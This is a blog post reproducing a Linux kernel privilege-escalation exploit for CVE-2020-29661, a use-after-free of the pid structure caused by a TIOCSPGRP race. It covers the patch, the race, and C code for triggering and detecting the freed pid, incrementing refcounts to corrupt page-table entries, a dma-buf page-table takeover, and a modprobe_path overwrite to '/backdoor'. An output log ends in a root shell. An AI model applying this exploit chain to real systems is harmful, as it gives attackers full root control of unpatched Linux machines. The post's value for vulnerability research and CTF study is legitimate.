Preface
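While reading Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel, I noticed that it does not describe the exploitation of CVE-2020-29661 in much detail, and I could not find a detailed public exp online either. The only one available, written by the researcher who first reported the bug, did not work for me for various reasons. I therefore decided to reproduce the vulnerability myself with the Dirty Pagetable method, drawing on the available material.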
Reproduction environment and source repository: https://github.com/TLD1027/CVE-2020-29661
patch
diff --git a/drivers/tty/tty_jobctrl.c b/drivers/tty/tty_jobctrl.c
index 28a23a0fef21c3..baadeea4a289bf 100644
--- a/drivers/tty/tty_jobctrl.c
+++ b/drivers/tty/tty_jobctrl.c
@@ -494,10 +494,10 @@ static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t
     if (session_of_pgrp(pgrp) != task_session(current))
         goto out_unlock;
     retval = 0;
-    spin_lock_irq(&tty->ctrl_lock);
+    spin_lock_irq(&real_tty->ctrl_lock);
     put_pid(real_tty->pgrp);
     real_tty->pgrp = get_pid(pgrp);
-    spin_unlock_irq(&tty->ctrl_lock);
+    spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
     rcu_read_unlock();
     return retval;
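The original code does take a lock with spin_lock_irq, but put_pid operates on real_tty while the lock that is taken belongs to tty. When two callers reach the same real_tty through different tty objects (for example the two ends of a pty pair), they hold different locks and can race: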
ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
  spin_lock_irq(...)                  spin_lock_irq(...)
  put_pid(old_pid)
                                      put_pid(old_pid)
  real_tty->pgrp = get_pid(A)
                                      real_tty->pgrp = get_pid(B)
  spin_unlock_irq(...)                spin_unlock_irq(...)
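The reference count of old_pid is decremented one extra time, so the pid structure is freed while it is still in use, which gives us a UAF on the pid structure.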
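The interleaving can be replayed deterministically in user space. The sketch below is only a model under my own assumptions: fake_pid, fake_put, fake_get and replay_race are hypothetical names, not kernel code, and the starting count of 2 stands for one reference held by the tty and one held by the task.

```c
#include <assert.h>

/* Hypothetical stand-in for struct pid: only the reference count matters. */
struct fake_pid {
    int refcount;
    int freed;
};

/* Model of put_pid(): drop one reference, mark the object freed at zero. */
static void fake_put(struct fake_pid *p)
{
    assert(p->refcount > 0);
    if (--p->refcount == 0)
        p->freed = 1;
}

/* Model of get_pid(): take one reference. */
static struct fake_pid *fake_get(struct fake_pid *p)
{
    p->refcount++;
    return p;
}

/*
 * Replays the racy order: both callers read the same old pointer and each
 * drops a reference to it before either one stores its replacement.
 * Returns the final reference count of the old object.
 */
static int replay_race(struct fake_pid *old, struct fake_pid *a,
                       struct fake_pid *b)
{
    struct fake_pid *pgrp = old;       /* models real_tty->pgrp */
    struct fake_pid *seen_by_a = pgrp; /* caller A reads the old pointer */
    struct fake_pid *seen_by_b = pgrp; /* caller B reads the same pointer */

    fake_put(seen_by_a);               /* A: put_pid(old_pid) */
    fake_put(seen_by_b);               /* B: put_pid(old_pid) a second time */
    pgrp = fake_get(a);                /* A: real_tty->pgrp = get_pid(A) */
    pgrp = fake_get(b);                /* B: overwrites A's store */
    (void)pgrp;
    return old->refcount;
}
```

With an old object that starts at a count of 2, one racy round is enough to bring it to zero even though the task still points at it. As a side effect, the reference taken on A is never dropped in this model.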
Exploitation
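To apply the Dirty Pagetable method, we first need to use cross-cache to get the slab that holds the vulnerable structure reclaimed. Because the pid structure is allocated from a dedicated kmem_cache, my first attempt was to spray pid objects, but I ran into two problems. First, so that the forked processes could be released when needed, I used a flag in shared memory, which means every child has to spin in a loop checking whether the flag is set. With a large number of forked children this consumes too many resources and takes too long. Second, reaping them with wait could also hang indefinitely, and it was hard to tell whether the release was merely slow because of the number of processes or whether a process was deadlocked. So I went back to the article by the researcher who first reported the bug: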
https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html
After reading it, I found that the author's exp uses seq_file:
/*
 * The child pid should be in a page together with a bunch of seqfiles
 * allocations and nothing else.
 */
int seqfiles[32*2];
for (int i=0; i<32; i++)
    seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));
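Because of the slab alias mechanism, the two kinds of objects are allocated from the same slab, so simply opening /proc/self/maps is enough to spray the heap. For the cross cache step, however, we first have to trigger the bug and get the pid freed, and how do we tell whether the race actually succeeded? The original article describes its approach as follows: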
[...] struct pid with multiple dangling references:
1. Allocate a new struct pid (by creating a new task).
2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).
3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
5. Create a new thread, and let that thread attempt to drop all the references we created.
Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid [...]
struct upid {
    int nr;
    struct pid_namespace *ns;
};

struct pid
{
    atomic_t count;
    unsigned int level;
    /* lists of tasks that use this pid */
    struct hlist_head tasks[PIDTYPE_MAX];
    struct rcu_head rcu;
    struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
    struct pid_namespace *ns;

    if (!pid)
        return;

    ns = pid->numbers[pid->level].ns;
    if ((atomic_read(&pid->count) == 1) ||
         atomic_dec_and_test(&pid->count)) {
        kmem_cache_free(ns->pid_cachep, pid);
        put_pid_ns(ns);
    }
}
[...]) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)
Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.
If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED [...]
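In pid->numbers[pid->level], pid->level will have been overwritten with a very large random value. The first challenge is that this access must not land in unreadable memory, which means the readable address space has to be large enough. In addition, the ns value obtained this way [...]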
kmem_cache_free(ns->pid_cachep, pid);
put_pid_ns(ns);
Here ns->pid_cachep has to be a kernel heap address, otherwise the call cannot get through kmem_cache_free. Next, look at put_pid_ns:
void put_pid_ns(struct pid_namespace *ns)
{
    struct pid_namespace *parent;

    while (ns != &init_pid_ns) {
        parent = ns->parent;
        if (!kref_put(&ns->kref, free_pid_ns))
            break;
        ns = parent;
    }
}
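[...] the UAF is triggered, so judging from this function one can roughly guess that the exit condition of the while loop is never satisfied. The third challenge is therefore that ns->parent has to happen to form a circular list in which no element satisfies the exit condition. Putting this analysis together, I tentatively conclude that the original author's exp only works under theoretical conditions, or succeeds with very low probability, so we need a new way to check whether the UAF on the pid structure has been triggered.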
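The "zero to 64 GiB" range in the quoted passage follows from simple arithmetic: level is a 32-bit value used to index an array of struct upid. A minimal sketch, assuming an LP64 layout in which struct upid occupies 16 bytes (UPID_SIZE and upid_offset are names I made up for illustration):

```c
#include <assert.h>
#include <stdint.h>

/* Assumed size of struct upid { int nr; struct pid_namespace *ns; } on LP64. */
#define UPID_SIZE 16u

/* Byte offset of numbers[level] relative to numbers[0]. */
static uint64_t upid_offset(uint32_t level)
{
    return (uint64_t)level * UPID_SIZE;
}
```

The largest possible level gives an offset just below 2^32 * 16 bytes, which is 64 GiB.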
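Inspired by my team lead, I did find a simpler and faster way to tell whether the structure has been freed: check the process ID with getpid. First, observe that during the race the refcount of the child's pid starts at 2. If the race succeeds and hits the child, the child's pid structure is therefore already freed after a single round. If we then immediately fork a new process, it takes over the pid structure that belonged to the child and updates the process ID stored in it. In other words, we only need to check whether the child's process ID has changed to know whether this pid has been freed: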
for (child_i = 0; child_i < MAX_FORK_NUM; child_i++)
{
    pid_t child = SYSCHK(fork());
    if (child == 0)
    {
        SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
        pin_cpu(1);
        SYSCHK(setpgid(0, 0));
        child = getpid();
        // Race rounds, synchronized with the parent through *syncptr.
        for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++)
        {
            while (1)
            {
                char syncval = *syncptr;
                if ((syncval & 1) == 0)
                {
                    if (syncval == 10)
                        break;
                    *syncptr = syncval + 1;
                }
            }
            SYSCHK(ioctl(tty, TIOCSPGRP, &parent));
            *syncptr = 11;
        }
        while (1)
        {
            if (*(syncptr + child_i + 0x100) == 1)
            {
                if (getpid() == child) {
                    // PID unchanged: this child's pid structure was not freed.
                    *(syncptr + child_i + 0x100) = 2; // continue
                    while (1) {
                        if (*(syncptr + child_i + 0x100) == 4)
                        {
                            *(syncptr + child_i + 0x200) = 1; // exit the new fork;
                            exit(0);
                        }
                    }
                }
                else {
                    // PID changed: our pid structure was freed and reused by the new fork.
                    printf("[*] child : %d, new-child : %d\n", child, getpid());
                    *(syncptr + child_i + 0x100) = 3; // find the uaf pid
                    while (1) {
                        if (*(syncptr + child_i + 0x100) == 4) {
                            printf("[*] Free the uaf pid again\n");
                            *(syncptr + child_i + 0x200) = 1; // exit the new fork;
                            while (1)
                            {
                                if (*(syncptr + child_i + 0x100) == 10)
                                {
                                    SYSCHK(listen(listensock, 128));
                                    *(syncptr + child_i + 0x100) = 9;
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    // Parent side of the race rounds.
    for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++)
    {
        SYSCHK(ioctl(ptmx, TIOCSPGRP, &child));
        *syncptr = 0;
        while (1)
        {
            char syncval = *syncptr;
            if ((syncval & 1) == 1)
            {
                *syncptr = syncval + 1;
                if (syncval == 9)
                    break;
            }
        }
        SYSCHK(ioctl(ptmx, TIOCSPGRP, &parent));
        while (*syncptr != 11)
            ;
    }
    // Fork right away so that a freed pid structure gets reused by the new process.
    int fack = fork();
    if (fack == 0)
    {
        while (1) {
            if (*(syncptr + child_i + 0x200) == 1) exit(0);
        }
    }
    *(syncptr + 0x100 + child_i) = 1;
    while (1)
    {
        if (*(syncptr + child_i + 0x100) == 2)
        {
            break;
        } else if (*(syncptr + child_i + 0x100) == 3)
        {
            break;
        }
    }
    if (*(syncptr + child_i + 0x100) == 3)
    {
        printf("[*] Find the uaf pid in child : %d\n", child_i);
        break;
    }
}
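At this point we have located the UAF pid structure. What follows is the usual cross cache procedure, after which we spray a large number of PTE page tables to occupy the slab that held the pid structure.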
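Because the pid has been freed, the only way to operate on it without causing a kernel panic is to increment its refcount. For every slot of the PTE page table that may overlap the refcount of a pid, we therefore need [...]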
struct pid {
    refcount_t                 count;                /*     0     4 */
    unsigned int               level;                /*     4     4 */
    spinlock_t                 lock;                 /*     8     4 */

    /* XXX 4 bytes hole, try to pack */

    struct hlist_head          tasks[4];             /*    16    32 */
    struct hlist_head          inodes;               /*    48     8 */
    wait_queue_head_t          wait_pidfd;           /*    56    24 */
    /* --- cacheline 1 boundary (64 bytes) was 16 bytes ago --- */
    struct callback_head       rcu;                  /*    80    16 */
    struct upid                numbers[];            /*    96     0 */

    /* size: 96, cachelines: 2, members: 8 */
    /* sum members: 92, holes: 1, sum holes: 4 */
    /* last cacheline: 32 bytes */
};
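Since count sits at offset 0, the slots that matter are the page-table entries lying at the start of each former pid object. The sketch below works out those indices under assumptions of my own: 4 KiB pages, 8-byte PTEs, and 128-byte pid objects (the 96-byte header plus one 16-byte upid, rounded up by cache alignment). The macro and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SIZE_BYTES 4096u
#define PTE_SIZE_BYTES  8u
/* Assumption: 96-byte header + one 16-byte upid, aligned up to 128 bytes. */
#define PID_OBJ_SIZE    128u

/* Number of pid objects that fit in one slab page. */
static size_t pids_per_page(void)
{
    return PAGE_SIZE_BYTES / PID_OBJ_SIZE;
}

/* Index of the PTE whose low 32 bits overlap the count field of object k. */
static size_t pte_index_for_pid(size_t k)
{
    assert(k < pids_per_page());
    return (k * PID_OBJ_SIZE) / PTE_SIZE_BYTES;
}

/* Distance in user virtual memory between two such PTEs' mappings. */
static size_t va_stride_bytes(void)
{
    return (PID_OBJ_SIZE / PTE_SIZE_BYTES) * PAGE_SIZE_BYTES;
}
```

Under these assumptions only every 16th PTE can overlap a refcount, which corresponds to one mapped page every 0x10000 bytes of virtual address space. The 0x10000 spacing between 0x10000290000 and 0x100002a0000 in the output log appears consistent with this.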
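[...] when the refcount is incremented, we can tell which virtual address corresponds to the vulnerable pid structure by watching whether the value read at each candidate virtual address changes. To increment the refcount we use the method described by the original author: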
void add_to_refcount(int count, int listensock)
{
    for (int i = 0; i < count; i++)
    {
        // Each connection to the listening socket takes one more reference.
        int refsock = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
        SYSCHK(connect(refsock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)));
        // Drain the backlog so that later connect() calls can proceed.
        SYSCHK(accept(listensock, NULL, NULL));
    }
}
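The file descriptor limit here is 4096, but a single step needs at least 0x1000 increments before the PTE points at the next physical page, so we need child processes to get around the limit. Each process can only keep a limited number of file descriptors open, but if we create many child processes, each of them can go on adding references.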
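A rough budget makes the constraint concrete. The sketch below is a simplification under my own assumptions: every add_to_refcount iteration keeps two descriptors open (refsock and the accepted socket), and fds_in_use is a hypothetical count of descriptors the process already holds.

```c
#include <assert.h>

/* Each iteration keeps refsock and the accepted socket open. */
#define FDS_PER_INCREMENT 2u

/* How many refcount increments one process can afford. */
static unsigned increments_per_process(unsigned fd_limit, unsigned fds_in_use)
{
    assert(fds_in_use <= fd_limit);
    return (fd_limit - fds_in_use) / FDS_PER_INCREMENT;
}

/* How many processes are needed for a given number of increments. */
static unsigned processes_needed(unsigned increments, unsigned per_process)
{
    assert(per_process > 0);
    return (increments + per_process - 1) / per_process;
}
```

Even a process with no other descriptors open stays below 0x1000 increments at a limit of 4096, so the work has to be split. At 0x400 increments per child, four children would cover one 0x1000 step.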
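I started with the simplest approach and forked one child process to add references, but it quickly failed with an error saying that the limit had been reached. Suspecting that one child was not enough, I forked more processes, yet the limit was still hit. Debugging showed that no matter how many processes I started, the count always stalled at the same ceiling. Looking into it, I found that this is because fork inherits the parent's file descriptors, which makes this approach unworkable. clone can also create child processes, and as I understood it can be told not to inherit the file descriptors, so I tried doing the increments through clone and did manage to modify the PTE. (Strictly speaking, a clone call without CLONE_FILES still gives the child a copy of the parent's descriptor table, as fork does.)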
int child_func(void *arg) {
    int num = *((int *)arg);
    add_to_refcount(num, listensock);
    sleep(1);
    while (1) {}   // stay alive so the sockets remain open
}

int main()
{
    ...
    char *stack;
    char *stack_top;
#define STACK_SIZE (1024 * 1024)
    // Allocate stack space for the child process
    stack = malloc(STACK_SIZE);
    if (stack == NULL) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }
    stack_top = stack + STACK_SIZE;
    int flags = SIGCHLD;
    // Create the child process
    int times = 0x400;
    clone(child_func, stack_top, flags | SIGCHLD, &times);
    ...
}
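Once we have located the user address that corresponds to the PTE overlapping the vulnerable object, we can use the increment to point that PTE at other physical addresses. However, the physical pages handed out by mmap are not contiguous with the physical addresses of kernel code or of page-table pages, and we only have an increment primitive, not a decrement one. We therefore use dma-buf, whose pages tend to sit next to page-table pages: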
|-------|
| ... |
|-------|
| PTE |
|-------|
| DMA |
|-------|
| PTE |
|-------|
| ... |
|-------|
This lets us reach the goal of mapping a PTE page-table page into user space. The overall flow is therefore:
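1. Allocate 10 user page tables.
2. Use the increment primitive to get the same physical page mapped at two different virtual pages, which identifies addr1.
3. Release the page behind addr1 and allocate a dma-buf shared page at addr1.
4. Allocate 10 user page tables.
5. Use the increment primitive to change the physical address behind the dma-buf mapping into the address of a page-table page, so that the page-table page is mapped at virtual address addr1.
6. Read addr1 to check whether the mapping succeeded. If it did, add 0x1000 to the entry visible at addr1 so that the physical page originally behind virtual address addr3 becomes mapped at addr2, and find addr2 the same way as before.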
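The "+0x1000" in the steps above works because bits 12 and up of an x86-64 PTE hold the physical page address, while the refcount overlaps the low 32 bits. A minimal sketch, assuming the flag pattern visible in the output log (0x8000000000000067: NX, dirty, accessed, user, writable, present); make_pte, pte_phys and pte_after_increments are illustrative names, not functions from the exploit:

```c
#include <assert.h>
#include <stdint.h>

#define PTE_FLAGS     0x8000000000000067ULL /* NX | D | A | US | RW | P */
#define PTE_ADDR_MASK 0x000ffffffffff000ULL /* physical address bits 12..51 */

/* Build a user-accessible, writable, non-executable PTE for a physical page. */
static uint64_t make_pte(uint64_t phys)
{
    return (phys & PTE_ADDR_MASK) | PTE_FLAGS;
}

/* Extract the physical page address from a PTE. */
static uint64_t pte_phys(uint64_t pte)
{
    return pte & PTE_ADDR_MASK;
}

/* PTE value after n increments of the 32-bit counter overlapping its low half. */
static uint64_t pte_after_increments(uint64_t pte, uint32_t n)
{
    uint64_t low = (pte & 0xffffffffULL) + n;

    assert(low <= 0xffffffffULL); /* this sketch does not model overflow */
    return (pte & 0xffffffff00000000ULL) | low;
}
```

For example, 0x1000 increments applied to 0x800000013fe6a067 give 0x800000013fe6b067: the flags are unchanged and the entry now points at the next physical page.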
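At this point we have built a controllable page-table page at addr1 together with the virtual page addr2 that it maps. We can now walk physical memory from the starting address, reading through addr2 to decide whether we have found the physical base of the kernel image. Once the base is found, we keep scanning for the physical address of modprobe_path, overwrite the program it names with /backdoor, and then execute /error (a file the kernel cannot recognize as an executable format, so it invokes the modprobe_path helper) to get /backdoor run, which modifies /etc/passwd. Alternatively, the escape can be achieved by patching the kernel text directly.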
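The scan can be pictured as two small helpers: one fills a whole page table with consecutive physical pages, the other searches the resulting window for the target string. This is a sketch under my own assumptions, operating on ordinary buffers rather than on the real addr1 and addr2 mappings; fill_window and find_string are hypothetical names, and the 512-entry window is inferred from the 0x200000 steps in the output log.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define PTES_PER_TABLE   512u
#define WINDOW_PTE_FLAGS 0x8000000000000067ULL /* flag bits seen in the log */

/*
 * Point all 512 entries of a page table at consecutive physical pages
 * starting at phys_base. Returns the base of the next 2 MiB window.
 */
static uint64_t fill_window(uint64_t *table, uint64_t phys_base)
{
    for (unsigned i = 0; i < PTES_PER_TABLE; i++)
        table[i] = (phys_base + (uint64_t)i * 0x1000) | WINDOW_PTE_FLAGS;
    return phys_base + (uint64_t)PTES_PER_TABLE * 0x1000;
}

/* Byte offset of needle inside the window, or -1 if it is not present. */
static long find_string(const unsigned char *window, size_t len,
                        const char *needle)
{
    size_t n = strlen(needle);

    if (n == 0 || n > len)
        return -1;
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(window + i, needle, n) == 0)
            return (long)i;
    return -1;
}
```

A match on "/sbin/modprobe" is only a candidate. The log shows one false positive being skipped, so a real scan would confirm the hit before overwriting it.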
Result
[+] Boot took 2.05
[*] starting up...
[*] Increased fd limit from 1024 to 4096
[*] prepare PTE memory...
[*] executing in first level child process, setting up session and PTY pair...
[*] Begin cc1
[*] Begin cc2
[*] Begin cc3
[*] Launching child process
[*] child : 149, new-child : 150
[*] Find the uaf pid in child : 2
[*] Begin cc4
[*] UAF pid id : 2
[*] Free the uaf pid
[*] Free the uaf pid again
[*] Free finish
[*] Free the struct around uaf pid
[*] Free the struct in first 30 page
[*] Finish cc !
[*] spraying 10 pte's...
[*] spraying finish
[*] Find the pte in 0x10000290000, value 0x100002a0000
[*] Start dma
[*] dma_buf_fd : 7
[*] Start to unmap
[*] spraying finish
[*] Find the dma in 0x10000290000, pte-value 0x800000013fe6a067
[*] Find the pte-1 in 0x10001400000, value 0x10001c00000
[+] pte: 0x8000000050c00067 NUMBER TAG: 0xe801403f51258d48
[*] modprobe path: /sbin/modprobe
[*] setting physical address range to 0x8000000050c00067 - 0x8000000050e00067
[*] setting physical address range to 0x8000000050e00067 - 0x8000000051000067
[*] setting physical address range to 0x8000000051000067 - 0x8000000051200067
[*] setting physical address range to 0x8000000051200067 - 0x8000000051400067
[*] setting physical address range to 0x8000000051400067 - 0x8000000051600067
[*] setting physical address range to 0x8000000051600067 - 0x8000000051800067
[*] setting physical address range to 0x8000000051800067 - 0x8000000051a00067
[*] setting physical address range to 0x8000000051a00067 - 0x8000000051c00067
[*] setting physical address range to 0x8000000051c00067 - 0x8000000051e00067
[*] setting physical address range to 0x8000000051e00067 - 0x8000000052000067
[*] setting physical address range to 0x8000000052000067 - 0x8000000052200067
[*] modprobe path : /sbin/modprobe
[-] false positive. skipping to next one
[*] setting physical address range to 0x8000000052200067 - 0x8000000052400067
[*] setting physical address range to 0x8000000052400067 - 0x8000000052600067
[*] setting physical address range to 0x8000000052600067 - 0x8000000052800067
[*] setting physical address range to 0x8000000052800067 - 0x8000000052a00067
[*] setting physical address range to 0x8000000052a00067 - 0x8000000052c00067
[*] setting physical address range to 0x8000000052c00067 - 0x8000000052e00067
[*] setting physical address range to 0x8000000052e00067 - 0x8000000053000067
[*] setting physical address range to 0x8000000053000067 - 0x8000000053200067
[*] setting physical address range to 0x8000000053200067 - 0x8000000053400067
[*] setting physical address range to 0x8000000053400067 - 0x8000000053600067
[*] setting physical address range to 0x8000000053600067 - 0x8000000053800067
[*] setting physical address range to 0x8000000053800067 - 0x8000000053a00067
[*] setting physical address range to 0x8000000053a00067 - 0x8000000053c00067
[*] setting physical address range to 0x8000000053c00067 - 0x8000000053e00067
[*] setting physical address range to 0x8000000053e00067 - 0x8000000054000067
[*] setting physical address range to 0x8000000054000067 - 0x8000000054200067
[*] setting physical address range to 0x8000000054200067 - 0x8000000054400067
[*] modprobe path : /backdoor
[*] Found modprobe path at physical address 0x0000010001446aa0
/error: line 1: ����: not found
[*] flag : flag{test_flag_ujdbqwdwklqdmwqkldj}
/ $ su root
/ # id
uid=0 gid=0(root) groups=0(root)
/ # cat /etc/passwd
root::0:0:root:/root:/bin/sh
ctf:x:1000:1000:chal:/home/ctf:/bin/sh
/ #
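Unless otherwise stated, all articles on this blog are the author's original work.
If you repost this article, please credit the source: https://he.tld1027.com/2024/09/23/cve-2020-29661%e5%a4%8d%e7%8e%b0/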